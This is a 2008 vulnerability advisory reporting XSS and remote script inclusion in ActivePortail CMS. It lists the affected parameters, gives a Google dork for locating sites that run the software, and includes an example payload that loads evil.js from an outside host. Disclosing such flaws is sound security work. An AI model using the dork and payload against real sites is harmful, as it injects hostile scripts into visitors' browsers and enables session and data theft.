Ivan SanchezPACKETSTORM:70942
`+================================================================================================+
+ ActivePortail - Copyright AGIIR Network 2007/2008 & XSS - Remote Java Inclusion +
+================================================================================================+
Author(s): Ivan Sanchez
Product: ActivePortail® CMS - Copyright AGIIR Network 2007/2008
Web:http:http://www.activeportail.fr/
Versions: All Version
Date: 14/10/2008
"
ActivePortail® CMS est un outil de gestion de contenu web dynamique,
il permet de créer et exploiter les pages de votre portail internet..."
GOOGLE DORKS:
------------
intext:" Copyright AGIIR Network "
Parameters Affected:
-------------------
1-recherche.php? (from Post)
mot_rech =insert-evil-remote-java.js
2-ged.php? (from querystring)
pkcateg=insert-evil-remote-java.js
(and other parameters are affected.)
Example insert remote file: "><script src=http://site/scripts/evil.js></script>
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================================+
+ ActivePortail - Copyright AGIIR Network 2007/2008 & XSS - Remote Java Inclusion +
+================================================================================================+`